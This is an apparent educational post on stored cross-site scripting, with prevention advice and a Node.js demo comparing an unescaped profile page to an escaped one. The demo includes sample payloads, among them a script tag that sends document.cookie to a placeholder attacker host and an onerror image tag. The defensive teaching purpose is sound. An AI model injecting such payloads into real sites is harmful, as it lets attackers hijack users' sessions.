Introduction
XSS stands for Cross-Site Scripting. Web pages are written in HTML, where angle brackets mark instructions to the browser: text placed inside a <b> tag, for example, is displayed in bold. If you want an angle bracket to appear as text and not to act as an instruction, you escape it, replacing it with an entity code that the browser renders as the literal character: the browser renders &lt; as < and &gt; as >.
Web apps usually take input from the user, store it in a database, and render it back into pages later. If an attacker submits HTML as that input and the app stores it and later renders it into a page without escaping, the attacker's markup becomes part of the page for every user who views it. This is what is called cross-site scripting (strictly, the stored variant of it). It harmed users of the web app even before any scripting was involved: suppose you set </html> as your bio; when another user visits your profile and their browser reaches your bio, the document is closed in the middle of the page. Browsers try to recover from malformed markup, but injected tags can still break or take over whatever follows them on the page. This was a serious attack against websites.
Then JavaScript came along and made XSS far more dangerous: you can insert JavaScript into a page just by including a <script></script> tag in the HTML and writing the JavaScript inside it. The script runs in the victim's browser with the same privileges as the site's own code, so it can read the page, make requests as the logged-in user, and read any cookie that is not marked HttpOnly. Suppose you set, as your profile bio on a website that does not escape or filter tags, a script tag whose JavaScript sends document.cookie to a server you control; whenever any user visits your profile the script runs in their browser and their session cookies are sent to you.
A whole <script> tag is not the only way to exploit a website with XSS. Any place where user input ends up in the page can carry a payload, whether in a tag, an attribute, a URL or a piece of JavaScript that acts on the input. Event-handler attributes such as onerror on an <img> tag run JavaScript without any <script> tag at all, and the input does not even have to be stored: it can be reflected straight back from a request parameter, or written into the page by client-side script.
Preventive Measures
- Websites may use XSS filtering on user input so that HTML tags are filtered out, but filters on their own are routinely bypassed; treat filtering as a second line of defence, and if rich HTML from users must be accepted, clean it with an allowlist-based sanitizer rather than a blocklist of known-bad tags.
- Websites must escape user-controlled data when rendering it into HTML, encoding the characters that carry meaning in that context (<, >, &, " and ') so that stored input is always displayed as text. Escape at output time rather than only when storing, because the same stored data may later be rendered in a different context or output format.
- Websites must test their user interface, at every place where user input is displayed, so that no XSS vulnerability is left.
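As an added example (not code from the original post), the stored-XSS profile-bio scenario described above and the escaping called for in the preventive measures, written as a small Node.js script: a profile page is rendered once without escaping and once with output encoding, and each version is fed the three kinds of payload discussed (a stray closing tag, a cookie-stealing script tag, and an onerror attribute). The page template, the usernames, the payloads and the attacker.example host are all constructed for this example.

```javascript
// Added example, not code from the original post: a stored-XSS "profile bio"
// page rendered as a string so it runs in Node without a browser. The
// template, usernames and attacker payloads below are all constructed here.

// Constructed attacker inputs of the kinds described in the post.
const PAYLOADS = {
  // Plain markup injection: tries to close the document early.
  breakPage: "</html>",
  // Script injection: ships the visitor's cookies to an attacker host
  // (attacker.example is a placeholder, not a real server).
  scriptTag:
    "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>",
  // No <script> needed: an event-handler attribute on a broken image runs JS.
  eventHandler: '<img src=x onerror="alert(document.cookie)">',
};

// Vulnerable renderer: the stored bio is concatenated into the page unchanged,
// so whatever the user saved becomes markup for every visitor to the profile.
function renderProfileVulnerable(username, bio) {
  return `<html><body><h1>${username}</h1><p class="bio">${bio}</p></body></html>`;
}

// Output encoding for the HTML text and attribute contexts: replace the five
// characters that can change meaning there with entity codes. Applied at
// render time, so the database keeps the raw text and other outputs (JSON,
// plain-text e-mail) are not polluted by stored entities.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;") // must run first, or the entities below get re-escaped
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened renderer: same template, but every user-controlled value is escaped
// before it is inserted.
function renderProfileSafe(username, bio) {
  return `<html><body><h1>${escapeHtml(username)}</h1><p class="bio">${escapeHtml(bio)}</p></body></html>`;
}

// Demo-only check: count tag openers ("<" followed by a letter or "/") in the
// rendered page. The template above contributes exactly 8; anything more is
// markup that came from user input. (A "<" followed by a space, as in "2 < 3",
// is not a tag and is not counted.)
const TEMPLATE_TAG_COUNT = 8;
function countTags(html) {
  return (html.match(/<[A-Za-z\/]/g) || []).length;
}
function hasInjectedMarkup(html) {
  return countTags(html) > TEMPLATE_TAG_COUNT;
}

// Stand-alone run: print both renderings for each payload.
for (const [name, bio] of Object.entries(PAYLOADS)) {
  const vulnerable = renderProfileVulnerable("mallory", bio);
  const safe = renderProfileSafe("mallory", bio);
  console.log(`${name}: vulnerable, injected markup = ${hasInjectedMarkup(vulnerable)}`);
  console.log(`  ${vulnerable}`);
  console.log(`${name}: safe, injected markup = ${hasInjectedMarkup(safe)}`);
  console.log(`  ${safe}`);
}
```

Run it with node. In the vulnerable rendering each payload survives as live markup in the page; in the safe rendering the same bytes are displayed as text, and benign input such as "2 < 3 & cats" still reads correctly. Escaping for the HTML text context is the right fix for a bio shown as text, but it is not enough when user data lands inside a script block, a URL or a CSS rule; each of those contexts needs its own encoding.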
The places where user input can reach a page are practically endless, so XSS bugs keep turning up; this is one reason websites run bug bounty programs to find them.
Links
You can use the following websites to find out how XSS exploits work: